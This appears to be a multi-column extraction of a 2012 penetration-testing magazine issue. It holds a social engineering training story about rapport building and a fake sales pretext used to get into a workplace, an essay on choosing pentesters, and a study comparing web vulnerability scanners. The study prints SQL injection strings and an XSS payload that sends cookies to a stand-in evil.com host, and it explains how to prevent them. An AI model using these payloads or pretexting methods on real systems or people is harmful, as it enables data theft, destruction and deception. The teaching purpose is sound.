a living. Clark replied, Nothing as nearly as important as money saving business opportunity for Smith.
you. I am a sales representative for a computer printer Clark and Becker walked out of the coffee shop feeling
company and my friend handles maintenance on them. very good that they had accomplished their goals. Clark
It has been really busy because we are currently running looked at Becker and said, Let’s go grab a snack away
a special that includes a free network evaluation and from here and debrief what we just accomplished. Clark
printer upgrade package. I can’t believe our company informed Becker that it was critical to do an after action
can have this special and not lose money. review of every exercise they attempted so they could
Smith moved his chair a bit closer to Clark and evaluate the success and learn from any mistakes.
Becker’s table and inquired with an eager smile, What
a great coincidence meeting here this morning. Do you The After Action Review
think you would have time to come by my business and Clark and Becker left the coffee shop and drove to a
evaluate our system for me and give me an estimate on book store with a café that they didn’t believe Smith
upgrading? Becker looked at Clark in amazement trying frequented. They sat down at a table and Clark began the
his best to hide both his excitement and astonishment. conversation, So what do you think? Becker responded
Clark leaned in a little closer to Smith; smiled and that he though it went very well. Yes it did. Said Clark,
said, We typically can’t schedule anything without Now tell me about why it went well. Becker furrowed his
running it through our main office, but I’ll squeeze brow as he thought for a minute and replied, You did
you in somewhere. Please promise not to let our boss a really good job initiating the conversation with Smith
know. Smith enthusiastically nodded in agreement and when he came in, you built quick rapport. Clark agreed
thanked them both for this great opportunity. and wrote down the following techniques for building
Clark looked at his friend Becker and asked about what quick rapport (Figure 3).
time he needed to get back home to practice baseball
with his son. Becker remembered his instructions about Building Rapport
following Clark’s lead and replied, I still have a little time, Clark explained that you do not need to use all of the
but we should start wrapping it up. Smith interjected, techniques to be successful, but the more you use
My son plays baseball also, and how old is your son? the better your chances. Clark described how he used
Becker replied that his son was 12 and that he coached accommodating nonverbals when he initially spoke to
his baseball team. Smith moved his chair over to join smith over his shoulder with his body angled away from
Becker and Clark and went on to describe how he had him. Not invading an individual’s personal space is very
coached his own children for years and the wonderful important and the onset of a conversation. Smith also
enjoyment he has taken away from it. The conversation described how he utilized an artificial time constraint
between all three continued for another 20 minutes when he said, My friend and I are getting ready to leave.
and plans were made for meeting up early on Monday Clark highlighted that an individual is more likely to have
morning at Smith’s place of employment so that Becker a conversation with a stranger when they think it is not
and Clark could do a quick evaluation before anyone going to take longer than a minute or so.
else from Smith’s company got in to work. The three Becker was regarding the list and added, You utilized
shook hands heartily and thanked each other for such a sympathy theme when you asked him for his help
with settling our discussion. Excellent! Clark said. Clark
discussed how human beings have a compulsion to
respond to sympathy requests. What else did you
notice from the list? Becker was feeling more confident
now and offered, You validated his thoughts and
opinions when you said that we had an expert. Perfect!
exclaimed Clark. All human beings seek validation.
Validation signifies that you are accepted. Our ancestors
who were tribal relied upon acceptance within a group
for survival. Validation is one of the biggest underlying
techniques that can be utilized in any relationship.
Becker regarded the list again and couldn’t come up
with anything else. Clark asked him what he thought
about ego suspension. Becker offered that he didn’t
Figure 3. Techniques for building quick rapport understand what he meant by that as much. Clark

THE BEST OF 01/2012 Page 56 http://pentestmag.com


emphasized that the most important step in the process techniques are nothing that we all don’t use every day,
is ego suspension. He described how if you want to we just happen to use then consciously and with a
be successful you have to put the other individual’s purpose to achieve a goal.
thoughts and opinions ahead of your own, even if you
might disagree. Nothing can ruin a new relationship Elicitation / Conversation Techniques
quicker than disagreeing with the person you are Clark informed Becker that next he wanted to cover
trying to build rapport with. Clark said, I ensured you a few simple elicitation and conversation techniques
were using ego suspension when I stopped you from that enabled him to both verify that they were speaking
correcting Smith when he was telling us about his ideas with the correct person as well as broker an invite to
around dating. Becker thought silently for a second the facility. Clark took the same piece of paper he had
or two and recalled the urge he had to interject his written the rapport techniques on, flipped it over and
own ideas and felt embarrassed. Clark saw Becker’s wrote Elicitation / Conversation Techniques at the top.
embarrassment nonverbally and offered, Don’t be too He then drew a simple house and described how the
concerned; ego suspension is the very hardest thing an objective of elicitation of the desired information was the
individual can do. With more practice and awareness roof and that without the floor, two walls, and ceiling the
it will come much easier. Becker felt a little better and roof would collapse. He wrote the acronym PRIM down
thanked Clark for his insights and help. and then placed the words each letter represented
Clark asked Becker if he noticed the gift that he along a wall and floor of the house; pauses, reflective
gave Smith. Becker again looked confused and Clark questions, intentional misstatements, and minimal
quickly added, A gift very often does not take the form encouragers (see Figure 4). Clark went on to describe
of a material good. A gift can be non-tangible as well. the techniques he had used to glean more details and
Validation is a gift that we gave smith early on and the information from Smith.
biggest gift that we gave Smith was the free estimate Clark began by telling Becker that a reflective question
and possible good deal on upgrading his systems. I was simply a one or two word reply to a statement that
even sweetened the gift by making it special because someone else makes. This technique is very effective
I wasn’t telling my boss. Becker said, But that was and nonthreatening. For example, Clark was recalling
all made up and not real. Clark responded, Smith’s the conversation with Smith and how Smith planned
perception was that it was, and that is all that matters. to invite his daughter’s boyfriends over for dinner.
For the same reason that human beings seek validation Clark repeated the word, Dinner? Becker immediately
they also have a compulsion to reciprocate gifts. In tribal elaborated more on what he meant. Becker quickly
times, when a hunter shared his bounty, his gifts would recognized that Clark had done the same thing later
be reciprocated if he was ill or injured. Conversely, if on in the conversation when Smith said that he was a
a hunter did not share his bounty, he would not be purchasing manager. Clark had repeated back to him,
provided for should he be ill or injured. The survivors Purchasing manager? Clark commended Becker for the
were the gift givers. keen observation.
The list that Clark provided now made much more Clark asked Becker how he thought he induced Smith
sense and he clearly saw the techniques and how to volunteer that he was a purchasing manager. Becker
wonderfully they worked. Clark reminded him that these thought for a moment and said, I’m not sure, but you
did say to him that he must be a world renowned coffee
critic. Correct again. said Clark. That was an intentional
misstatement. Human beings have this incredible need
to correct others when they think they are wrong. This
need to correct highlights a lack of ego suspension
that we discussed earlier and it is also a form of self-
validation. It is probably the most effective elicitation
technique that I use and believe in. When I couple
that technique with a sympathy theme it is wonderfully
effective.
Clark quickly acknowledged that they had both used
minimal encouragers throughout the conversation.
Minimal encouragers are natural head nods, yes
statements, go on expressions, and any other verbal
Figure 4. Elicitation/Conversation Techniques or nonverbal expression that induces the other person

THE BEST OF 01/2012 Page 57 http://pentestmag.com


PENTEST REGULAR
to continue speaking. Additionally, the other individual to create a situation where the other person initiates
feels as though you are listening and paying attention. the desired action without a direct request. In this case,
Clark described how he also used silence after by presenting the information that we were running
Smith had provided a brief explanation of his job as a special deal I was hoping he would see that as an
purchasing manager. Clark sat silently, nonverbally opportunity for him. This utilizes another elicitation
inducing Smith to fill the slightly awkward silence with technique, Curiosity. Becker looked puzzled. Clark
more words. Clark informed Becker that most people quickly added that there were many more techniques
are very uncomfortable with silence and will tend to and that over time he would share them all with him.
fill the silence with words. Become comfortable with The two planned what time they would get together
some well placed silence in a conversation and you will on Monday. Becker was feeling great because he
continue to gather valuable information. began to realize that these techniques were not all
Becker was taking in all this fantastic knowledge and that new to him. He had been using them his entire life
then the most pressing question came to him; he asked already, he now understood a bit more how to use them
Clark, How did you get him to invite us to his company? proactively and with a purpose. Becker hoped that he
We never even asked. Clark commended Becker again would soon become as an effective Social Engineer
for his observation and described how he always tries and Pentester as Clark. He truly was passionate about

Bibliography
• Alessandra, Tony & O’Conner, Michael J. (1994). People Smarts: Bending the Golden Rule to Give Others What They Want. San
Diego: Pfeiffer & Company
• Alessandra, Tony & O’Conner, Michael J. (1996). The Platinum Rule: Discover the Four Basic Business Personalities and How
They Can Lead You to Success. New York: Warner Books.
• Burnham, Terry & Phelan, Jay. (2000). Mean Genes: From Sex to Money to Food Taming Our Primal Instincts. New York: Pen-
guine Books
• Briggs-Myers, Isabel & Myers, Peter. (1980) Gifts Differing: Understanding Personality Type. California: Davies-Black Publi-
shing.
• Carnegie, Dale. (1990). How to Win Friends and In�uence People. New York: Pocket Books.
• Dreeke, Robin. (November, 2011). It’s Not All About Me: The Top Ten Techniques for Building Quick Rapport With Anyone. Vir-
ginia: People Formula.
• Dreeke, Robin. (June, 2008). It’s All about Them: FBI Law Enforcement Bulletin.
• Dreeke, Robin & Navarro, Joe. (December, 2009). Behavioral Mirroring in Interviewing: FBI Law Enforcement Bulletin.
• Dreeke, Robin & Sidener, Kara. (November, 2010). Proactive Source Development: FBI Law Enforcement Bulletin.
• Glass, Lillian. (1995). Toxic People: 10 Ways of Dealing With People Who Make Your Life Miserable. New York: Simon and Schu-
ster
• Goldman, Daniel. (1995). Emotional Intelligence. New York: Bantam Books.
• Gosling, Sam. (2008). Snoop: What Your Stuff Says About You. New York: Basic Books
• Hadnagy, Christopher. (2011). Social Engineering: The Art of Human Hacking. Indiana: Wiley Publishing.
• Hoffer, Eric. (1989). The True Believer: Thoughts on the Nature of Mass Movements. New York: Harpers and Row, Publishers.
• Jaye, Aye. (1997). The Golden Rule of Schmoozing: The Authentic Practice of Treating Others Well. Naperville, Illinois: Source-
books.
• Keirsey, David & Bates, Marilyn. (1978). Please Understand Me: Character and Temperament Types. California: Prometheus
Nemsis Book Company.
• Kroeger, Otto, & Thueson, Janet M. (1988). Type Cast: The 16 Personality Types that Determine How We Live, Love, and Work.
New York: Dell Trade Paperback.
• Kushner, Harold S. (2001). Living a Life that Matters. New York: Anchor Books.
• Kushner, Harold S. (1986). When All You’ve Ever Wanted Isn’t Enough. New York: Fireside Books.
• Kushner, Harold S. (1980). When Bad Things Happen to Good People. New York: Avon.
• Lowndes, Leil. (2003). How to Talk to Anyone: 92 Tricks for Big Successes in Relationships. Columbus, Ohio: McGraw-Hill.
• McClish, Mark. (2001). I Know You Are Lying. Winterville, North Carolina: Policeemployment.com.
• Morris, Lois B., & Oldham, John M. (1995). New Personality Self-Portrait: Why You Think, Work, Love, and Act the Way You Do.
New York: Bantam Books.
• Napier, Michael R. (2010). Behavior, Truth and Deception: Applying Pro�ling and Analysis to the Interview Process. Boca Ra-
ton, Florida: CRC Press.
• Navarro. Joe. (2008). What Every Body is Saying: An Ex-FBI Agent’s Guide to Speed-Reading People. New York: Harper Collins.
• Nolan, John. (1996). Con�dential: Business Secrets: Getting Theirs – Keeping Yours. Medford Lakes, New Jersey: Yardley
Chambers.
• Rabon, Don. (2003). Investigative Discourse Analysis. Durham, North Carolina: Carolina Academic Press.
• Sheey, Gail. (1977). Passages: Predictable Crises of Adult Life. New York: Bantam Books.

THE BEST OF 01/2012 Page 58 http://pentestmag.com


helping individuals and companies better prepare and
protect themselves against those malicious individuals
who would do harm.

Conclusion
In conclusion, building rapport is perhaps the most
important technique that Social Engineers use in
fulfillment of their jobs. Most every Pentester’s primary
goal is to successfully resolve security issues both
with hardware and people. Without the critical skill of
developing rapport, the formula for success quickly
breaks apart. These skills are exactly the same
that master spies use in their information gathering
missions.
The challenges of today’s cyber security specialists
are immense and ever growing. Possessing advanced
computer skills is critical in combating the growing cyber
threats facing both our country as well as the citizenry.
While trying to master these new critical technologies
it is very important to remember that few if any issues
are resolved without understanding the human hacking
vulnerabilities. The art form known as interpersonal
skills that has been illustrated here in a paint-by-number
format will hopefully help keep these critical skills fresh
and up to date as computer security specialists continue
to battle the threats to both individuals and institutions.
This article is meant for those new to social engineering
seeking a step-by-step procedure that is in keeping with
the time honored methods of building rapport as well as
for those senior mentors who have been using these
techniques for years and were looking for easy ways
to describe and pass on these great skills to those
they are mentoring. By mastering new technologies as
well as maintaining our mastery of interpersonal skills,
Social Engineers will be able to continue to provide the
excellent service and protection our communities and
country have come to expect from them.

ROBIN DREEKE
Robin Dreeke is a 15 year FBI Veteran, co-trainer of the new
Social Engineering For Penetration Testers Course, lead
trainer for interpersonal skills in the FBI as well as head of
the FBI’s Behavioral Analysis Program. Robin is a recognized
expert, author, and gifted lecturer in the art of interpersonal
communication. Robin is a frequent lecturer and trainer of
Social Engineering and advanced communication skills and
techniques across the country. Robin recently published
his book, “It’s Not All About Me: The Top Ten Techniques for
Building Quick Rapport with Anyone.” The book highlights
rapport building skills and inserts them into a workbook style
book with many fascinating and funny stories. Additionally,
there are practical exercises that can improve anyone’s ability
to develop great rapport.

THE BEST OF 01/2012


PENTEST REGULAR

Tool Jockeys in
Disguise
Defeating the Push Button Penetration Testers
What drives your search for a penetration tester? Was it a recent
security breach or a compliance requirement or maybe just a
conversation over a round of golf with someone that recently
underwent an assessment? No matter what is the reason you will
need someone who is not only competent and familiar with the latest
threats and technologies but also someone that can associate the
vulnerability you have with the business risk to your organization.

T
his message is meant for you, all of you. The on the engagement and the client. There have been times
CISO and the IT Director the decision maker where no tools were used at all during an engagement to
and the network administrator’s the people that exploit a site while other times a custom built script will be
man the front lines of the information security trenches. the most efficient way to go. You should pay less attention
If there was ever a time for you to take stock in your to tools and timing and more attention to what your end goal
information security capital it’s now! should be for the engagement. I know a lot of people have
What’s your security strategy? When was the last the check list mentality and want to see a set list of things
time it was tested and by whom? Was the individual or to do or a certain toolset that should be used during an
entity qualified? How did the results of that engagement engagement but if your pen tester’s sticks to one particular
positively impact the security strategy within your method or toolset I guarantee you he will miss things.
organization? If you can’t honestly answer those Penetrating testing tools are useful during an engagement
questions then you may want to take a second look at and they can be used to perform trivial tasks but they should
the vendor and your choice of penetration tester. not be the crux of a penetration testers skill set.
Do you know what to expect from your vendor and
penetration tester? Unfortunately many companies do The Right Questions?
not know what to look for when engaging an information Defining what you need to test is as important to your
security vendor for a penetration test or vulnerability security strategy as having the proper policies and
assessment and can only smile and thank the vendor procedures in place to govern the security of your
when handed a report with lots of vulnerabilities marked organization. If your development team just built a web
with highs, mediums and lows. As the customer you facing application for your sales division and you want to
need to understand how those vulnerabilities affect your
bottom line and your business.

The Wrong Questions


During a recent engagement meeting we were asked by
the client, what tools do you use and how long does it
normally take you to break in during a penetration test?
Well in answer to that I have to say that it really depends Figure 1. Push button for PenTest

THE BEST OF 01/2012 Page 60 http://pentestmag.com


have it tested what would your requirements be for the test? of attack? Do you have a framework that you follow or a
Your penetration tester will have had at least, at a minimum, tried and tested approach? The whole idea behind a
performed a web application assessment before. I know penetration test is to emulate a skilled attacker in order to
that it may seem silly to not assume a basic level of skill test your security. In order to emulate an actual attacker
on the side of your penetration tester however I have seen your penetration tester should be asking you what’s most
examples where a previous engagement was completed important to your business and how will that tie in with what
and a break in later ensued on the application that was he will be testing. Not what IP range he will be scanning.
just tested. The first question that was asked by the CIO Putting a range of IP addresses into Nexpose or Core
was why didn’t the previous penetration testers catch this? Impact and pushing next, next and go should not be what
What is the penetration tester’s knowledge on current and a penetration test is all about. Your test should be about
evolving threats with the technology that you employ in your emulating the threats to your organization in a realistic
environment? It’s great if he is a whiz in SQL injection but fashion. The threats facing a Fortune 500 company on the
that won’t help you if you are running .net applications. western continental United States would not be the same
Once you have defined what you need to test the next threats faced by a small to medium business located in
question is why are you testing that? A typical scenario is China. There are several security standards such as the
a set of 5 IP addresses out of a class C network running OSSTMM (Open Source Security Testing Methodology)
hardened fully patched Windows Server 2008 operating or the PTES (Penetration Testing Execution Standard)
systems with ports 80 and 443 available with static that can be used by your penetration tester to test your
HTML pages. No social engineering, physical access particular environment. But what happens when your
or client side attacks are allowed! At the end of the test particular set of threats doesn’t fall neatly into one of your
your penetration tester may be happy to give you a report penetration testers testing methodologies? That’s when a
that says you are secure and move on to their next client well-tested blended approach and set of methodologies
but what about the rest of that class C? Don’t force your would be vital to your penetration tester’s toolset.
penetration to give you a false sense of security by only Upon completion of the engagement discuss the
testing what you know you are secure on. A seasoned results with your penetration tester and find out what the
attacker will immediately see those well patched servers real impact would be with the results that were found. If
and move on to their next target which may be your SQL you were vulnerable to cross site scripting what would
server that your developers refused to patch due to coding be the impact of a cross site scripting attack? Don’t just
constraints. If your organization does not have a policy in accept a report with a bunch of screenshots have your
place for dealing with social engineers sit down with your penetration tester explain to you how that would impact
penetration tester and ask what needs to be included in your business and security posture. The business
the policy creation. By sitting down with your penetration impact of temporarily infecting a visitor kiosk with
tester before the start of the engagement and discussing malware would be very different than the same malware
what your goals are as well as defining some of the known infecting your production webservers.
threats to your environment and technology you will be
able to better define what’s most at risk is and how an Conclusion
attacker could potentially target the asset. By doing this In the end your choice for a penetration tester will revolve
you will be able to not only cut down on the number of around your needs and your pricing constraints. Every
machines and networks that will need to be tested but you environment is different and will present its own unique
will be able to focus in on the path of least resistance. challenge’s and testing issues. No penetration tester is
an expert at everything and we can’t all be H.D Moore but
Approach Versus Method by challenging your penetration tester you will help raise
During your search for a penetration tester one question the bar within the information security community and
that should be posed to him is what exactly is your method make a definite impact on securing your organization.

WARDELL MOTLEY
Wardell Motley is a penetration tester
and security engineer at Accretive
Solutions Dallas a national consulting
and executive search �rm. He has
worked in information technology
and security for the past 8 years. He can be contacted at
Figure 2. Approach Versus Method wmotley@accretivesolutions.com.

THE BEST OF 01/2012 Page 61 http://pentestmag.com


PENTEST REGULAR

On the Automated
Black-Box Security
Testing of Web Applications

Fuzzing. Although this technique has been around since 1989,


it had gained significant importance only with the rise of cloud
computing era, which, ironically, means it is still in its early days (at
least for the web applications fuzzing). With a fully grown market
ranging from open-source and commercial thick clients to SaaS
and network/data center dedicated hardware, web applications
still represent the major point of compromise.

L
ooking at things this way I cannot help associating The most common way of securing web applications
this picture with the use of satellites and state of is searching and eliminating the vulnerabilities within.
the art war gear to catch a caveman. Is there According to OWASP (Open Web Application Security
something we are missing? Project), the most efficient way of finding security
vulnerabilities in web applications is manual code review.
Introduction This technique is very time-consuming and requires
Web technologies and applications are used programming skills. An alternative approach is to use
extensively by business and governments all over the automated tools (fuzzers) that probe web applications
world. Online commercial sites, intranet and extranet for security vulnerabilities, without access to source
applications used by companies are almost all based code used to build the applications. This technique is
on these technologies. Today, new applications are known as back-box testing or fuzzing and represents
systematically developed with web technologies due to a cost and time effective method for detecting security
ease of implementation and use. vulnerabilities. There are a lot of good black-box web
Despite their advantages, web applications do raise a scanners available on the market, distinguished from
number of security concerns. Remote code execution, SQL one another by performance, platforms and price.
injection, Cross Site Scripting (XSS) and session hijacking Our study aims to determine which factors may influence
are few examples of web application vulnerabilities. the results are and how effective automated black-box
These vulnerabilities combined with the public access to testing of web applications is. To achieve these goals, six
web applications have made them a target of choice for well-known web vulnerabilities scanners were selected
hackers. The Gartner Group estimates that almost up to (Acunetix WVS v.7.0, Netsparker v.1.8.3.3, ProxyStrike
75% of attacks are now targeting these applications. v.2.1, Websecurify v 0.8, QualysGuard WAS and Outscan
An insecure web application may expose customer’s WAS) and tested against a common set of sample
personal data, confidential information, or lead to applications, in two different environments: in the lab and
fraudulent transactions. This may cause financial, legal in the safe wild (will be discussed later in the article).
and reputational damage for the application owner. To
prevent such consequences, web applications must be Web Vulnerabilities
designed, developed, installed and used in a secure The topic of web vulnerabilities is widely discussed in
manner. literature. Books like The Web Application Hacker’s

THE BEST OF 01/2012 Page 62 http://pentestmag.com


Handbook: Discovering and Exploiting Security SELECT * FROM users WHERE name = ‘a’ OR ‘t’=’t’;
Flaws by Dafydd Stuttard and Marcus Pinto, Hacking
Exposed Web Applications, Third Edition, by Joel Furthermore, assuming that userName takes the value
Scambray, Vincent Liu and Caleb Sima, Improving Web below, the method would delete the entire content of
Application Security: Threats and Countermeasures by the table users.
Microsoft Corporation deal with the subject in general
by enumerating the vulnerabilities, showing how they a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ’%
work, how to discover and prevent them. There are also
organizations like OWASP [2], MITRE [1] and others Prevention
that publish yearly reports about top of most common Because SQLI attacks (and injection attacks in general)
vulnerabilities. Furthermore, there are numerous exploit the use of untrusted user data in the program
articles dealing with specific vulnerabilities in detail and code, the obvious solution is to validate untrusted
showing how specific vulnerabilities can be detected data before using it in application code. For SQL,
and prevented. the preferred option is to use a safe API that avoids
Presenting detailed information about each individual the interpreter entirely or provides a parameterized
type of web vulnerability is beyond the scope of our interface; such APIs exist for all major programming
article. This could be a possible subject for a book languages and development frameworks.
as only OWASP [5] alone lists 164 vulnerabilities in
24 categories. However, we consider it important Cross-Site Scripting (XSS)
to introduce the most common two vulnerabilities Cross-site scripting vulnerabilities occur most
(injection attacks and XSS) in order to give the reader commonly when applications employ untrusted data in
the background information necessary to comprehend the construction of output without proper validation or
our experiment. For each of them we will give a short escaping. Attackers take advantage of this vulnerability
description, an example and list some prevention in order to make browsers execute scripts prepared by
methods. the attacker in the context of a legitimate web page.
By these means, it is possible to hijack user sessions,
Injection Attacks insert hostile content, perform redirects, etc.
In injection attacks an attacker exploits vulnerabilities There are three types of XSS flaws.
in the web application in order to execute malicious
code and change the logic of the application. There • Reflected: the injected code is reflected off the web
are different types of injection attacks, depending server (Most Common)
on the language used and the environment of the • Stored: the injected code permanently stored on
application. The most common type of injection attack the target servers; the victim retrieves the malicious
is SQL Injection (SQLI). However, all interpreted script when it requests the stored content
languages are vulnerable to this type of attack; this • DOM-Based: the attack payload is executed as
includes web scripting languages such as PHP or a result of modifying the DOM of the page in the
ASP, operating systems interpreters such as Bash victim’s browser
or Perl and data retrieval languages such as LDAP,
XPath or SOAP. Example
Similar to SQLI, XSS attacks exploit applications that do
Example not properly validate user data. Assume the following
In the case of SQL, injection attacks usually exploit code snippet from a search engine that returns the
the fact that applications uses untrusted data in the search results together with the query:
construction of SQL calls. One example is given
below: (String) page += „You search was: „ + request.getParameter
(„query”);
SELECT * FROM users WHERE name = ‘” + userName + „’;
If an attacker modifies the query parameter to the value
Assuming that username is a legal user identifier the below, it will cause the victim’s cookies to be sent to
function would return the database row containing the the attacker’s web site.
information for the selected user. However, assuming
that userName is a’ or ‘t’=’t the method would return <script>document.location= ‘http://www.evil.com/
complete database with users. stealcookie.php?foo=’+document.cookie</script>

THE BEST OF 01/2012 Page 63 http://pentestmag.com


PENTEST REGULAR
Prevention received responses are scanned for indications of
The preferred prevention option is to properly validate vulnerabilities.
and escape all untrusted data that will be used in the This approach has been described in Detecting
construction of output. Depending on the output type, Security Vulnerabilities in Web Applications Using
appropriate escaping shall be performed for HTML Dynamic Analysis with Penetration Testing by
elements, HTML attributes, JavaScript, CSS, URLs, Andrey Petukhov, Dmitry Kozlov at the 2008 OWASP
etc. Application Security Conference. The main advantage
of this method is that it does not require access to the
Securing Web Applications source code of the web application and can be used to
The most common way to securing web applications is by detect vulnerabilities in already deployed applications.
searching and eliminating the discovered vulnerabilities. Furthermore, the approach is not dependent on the
Other ways to securing web applications include safe programming language of the web applications.
development (as described above), implementing However, it has the disadvantage of a poor coverage
intrusion detection and intrusion protection systems of application entry points for web applications that
and deploying web application firewalls. contain password protected areas or applications that
The existing approaches for detecting web incorporate heavy logic such as when in order to land
vulnerabilities can be divided into two main categories: on a page certain actions have to be performed in
white box (static) testing and black box (dynamic) advance (fill forms with specific data, etc.)
testing. Static approaches require access to source
code and are useful during development, while dynamic Comparative Results for Automated Black-
approaches are useful for protecting already deployed Box Testing
software. As a research project for a dissertation paper regarding
the efficiency of automated black-box web application
White-Box Approaches vulnerability testing, during February 2011, 6 web
In the white box approach, a tester has access to application vulnerability scanners were tested:
the source code of the web application and relies
on statically analysis algorithms to detect possible • Two fully functional commercial thick clients:
vulnerabilities. The most common approach is • Acunetix WVS v.7.0 build 20110209;
the tainted-mode model. In order to discover the • Netsparker v.1.8.3.3;
vulnerabilities, a program determines the input points • Two open-source thick clients:
of a web application (such as data retrieved via HTTP • ProxyStrike v.2.1;
GET/POST, cookies, database, etc.) and tracks the • Websecurify v 0.8;
program flow in order to determine which outputs • Two SaaS applications:
(database queries for SQLI or HTTP pages for XSS) are • QualysGuard WAS;
produced based on the inputs. If an input parameter is • Outscan WAS.
properly validated, the flow of the program will no longer
be tracked for this particular input. However, if an input In order to measure their effectiveness, the web
parameter can be tracked all the way to the output, a application scanners were tested in two environments:
vulnerability is reported.
The tainted-mode model has been described in “In the lab” (ideal testing conditions), namely:
papers [7] and numerous tools have been implemented
based on this approach, for different web programming • Two computers were networked, with no outside
languages such as PHP [7], Java [8], Ruby or Perl. connection;
• One of the computers hosted the intentionally-left-
Black-Box Approaches vulnerable web application (i.e. WAVSEP [9]) and
The black-box approach is based on the simulation of the other one the thick client scanners;
attacks against a web application. For this purpose a • All security measures on both computers were
testing tool usually relies on a large database of known disabled so that no packets would be dropped;
attacks. In a first step the web application is scanned • Both computers were running Microsoft Windows 7,
and all pages are retrieved. After that, for each page fully updated;
the data entry points (HTTP parameters, cookies, etc.) • In order to run WAVSEP the latest editions of
are extracted. Next, the testing tool generates requests Apache Tomcat and MySQL Community Server
where parameters contain malicious patterns and the were also installed.

THE BEST OF 01/2012 Page 64 http://pentestmag.com


• php.testsparker.com (owned by Mavituna
Security) – further referred to as Site 4;
• aspnet.testsparker.com (owned by Mavituna
Security) – further referred to as Site 5;
• crackme.cenzic.com (owned by Cenzic) – further
referred to as Site 6;
• demo.testfire.net (owned by IBM) – further
referred to as Site 7;
• Local security measures were enabled;
• The scanning was performed over the Internet.

Figure 1. Graphical Representation of the Results The research only focused on the two most widespread
The reason for testing the scanners in the lab was that a red-flag vulnerabilities: XSS and SQLI. Thus, one of
vulnerable web application to which all the vulnerabilities the open-source scanners was intentionally picked
are known (both valid and false positives), could be because it can only detect SQLI and XSS.
scanned, whilst assuring an environment where the Before going any further we need to make the
scanners wouldn’t be censored by any firewall, IDS or IPS. following notes regarding the scanners:

“In the safe wild”(real testing conditions), namely • Acunetix WVS was tested with AcuSensor
Technology OFF, and Port Scanner OFF;
• Seven public intentionally-left-vulnerable sites were • ProxyStrike was tested using only manual crawling
picked: due to automated crawler inefficacity;
• testphp.vulnweb.com (owned by Acunetix) – • Websecurify and SaaS scanners support limited
further referred to as Site 1; configuration, so they were tested mainly in Point
• testasp.vulnweb.com (owned by Acunetix) – and Shoot mode;
further referred to as Site 2; • Netsparker’s results had to be divided into two
• testaspnet.vulnweb.com (owned by Acunetix) – subcategories (due to its official presentation – i.e.
further referred to as Site 3; false positive free scanner):
a d v e r t i s e m e n t

����������������
“We help protect critical infrastructure one byte at a time”

• ���� Checklists, tools & guidance


•���� Local chapters
• ������ builders, breakers and defenders
• ���������� ������������������������������������������������� and more..

��������������������������������
PENTEST REGULAR
Table 1. “In the Lab” Detailed Scan Results
RXSS[1] SQLI[2] FP RXSS[3] FP SQLI[4] Detection rate False Positive
Total Vulns 66 136 7 20 RXSS + SQLI Detection rate
RXSS + SQLI
Acunetix 44 121 0 0 81,6% 0%
QualysGuard 39 80 3 2 58,9% 18.5%
Websecurify 22 80 3 10 50,4% 48,1%
ProxyStrike 61 46 7 0 52,9% 25,9%
Netsparker C. 42 41 132 128 0 0 6 0 86% 83,6% 22,2% 0%
N.C. 1 4 0 6 2,4% 22,2%

[1] Reflected Cross-Site Scripting Vulnerabilities [3] False Positive Reflected Cross-Site Scripting Vulnerabilities
[2] SQL Injection Vulnerabilities [4] False Positive SQL Injection Vulnerabilities

• Confirmed vulnerabilities; order to later analyze the gap between the two testing
• Non-confirmed vulnerabilities. sets.
After running the scans, the following results were
Testing Results obtained: Table 2.
In the Lab Results
This test was mainly aimed at thick clients, but during In the Lab vs. in the Safe Wild
testing, the same web application was managed to be After running all the detection rate percentages were
scanned with one of the SaaS scanners, QualysGuard compared in order to see how big is the gap, what
WAS. Please note that the SaaS scanning was could be the possible reasons for it, and if there are any
performed over the Internet (meaning there were possibilities to close this gap.
different testing conditions) as we did not have any
access to either of the SaaS’ Internal Appliances, and Causes that Can Influence Results
this may have influenced the rate of detection. After analyzing the results, there are only two causes
After running the scans, the following results were identified for the results (scanner independent): Web
obtained: Table 1. application stability and connection.
As it can be seen, in the lab, up to almost 84%
of existing vulnerabilities can be detected by using Web Application Stability
only one scanner. But these are the easy-to-detect Whilst running in the safe wild tests a part of one site
vulnerabilities (the low hanging fruits, as they are became unavailable, thus causing some scanners
called), leaving us to further deal with the top 16% to miss a part of the vulnerabilities. This issue was
difficult-to-detect vulnerabilities. noticed due to significant results difference between
scanners. Some scanners had an unexplainable low
In the Safe Wild Results detection rate whilst other scanners, just minutes
This test targeted all scanners and its purpose was to before, performed very well. The tests had to be
see how the scanners would behave in real working redone when all pages of the web application were
conditions and what results they will manage to pull in available (manual check).
Table 2. “In the Safe Wild” Detailed Results
Site 1 Site 2 Site 3 Site 4 Site 5 Site 6 Site 7 Detection Rate
Total vulns 29 22 8 3 4 26 27
Acunetix 21 14 6 2 2 11 12 57,1%
QualysGuard 22 7 1 2 2 5 13 43,6%
Websecurify 10 11 2 0 0 3 5 26%
ProxyStrike 6 6 4 2 2 8 8 30,2%
Netsparker C. 15 14 14 12 7 7 3 3 4 4 11 8 9 6 52,9% 45,3%
N.C. 1 2 0 0 0 3 3 7,6%
Outscan 10 9 0 2 2 5 4 26,8%

THE BEST OF 01/2012 Page 66 http://pentestmag.com


Table 3. Scanning Results Comparison
Lab Wild Gap
Acunetix 81,6% 57,1% 24,5%
QualysGuard 58,9% 43,6% 15,3%
Websecurify 50,4% 26% 24,4%
ProxyStrike 52,9% 30,2% 22,7
Netsparker C. 86% 83,6% 52,9% 45,3% 33,1% 38,3%
N.C. 2,4% 7,6% 5,2%
Outscan - 26,8% -
Figure 2. Graphical Representation of the Results
Connection In order to confirm this assumption the Acunetix
This is another important issue which was managed to be development team was asked for help by running scans
identified with the help of Acunetix development team. Due on one of their web applications from different offices
to a significant difference between the scan results we’ve around the world, and provide us with the scan results.
had and scan results Acunetix Development Team had, Their developers managed to perform the test (using
using Acunetix WVS, the first assumption was that the AcuSensor Technology as well) from the U.S.A. Office and
scanner was being misused. After redoing the tests and the Romania – Cluj Office, and got the following results.
getting the same results, the only plausible assumption that The findings confirmed the previously made
could have been made was there might be a connection assumption on the connection dependence. This
problem, i.e. between our location (Bucharest – Romania) means that whilst only a part of the vulnerabilities can
and the web application’s server (Host, Nordrhein- be detected and fixed from Romania, thus making the
Westfalen, Germany) was an active node (Firewall, IDS, web application appear as vulnerability-free from this
IPS) which dropped a part of the packets. location, an attacker located in U.S.A. can detect nine

a d v e r t i s e m e n t

THE BEST OF 01/2012 Page 67 http://pentestmag.com


PENTEST REGULAR

Bibliography
• Top 25 MITRE, http://cwe.mitre.org/top25/ [1]
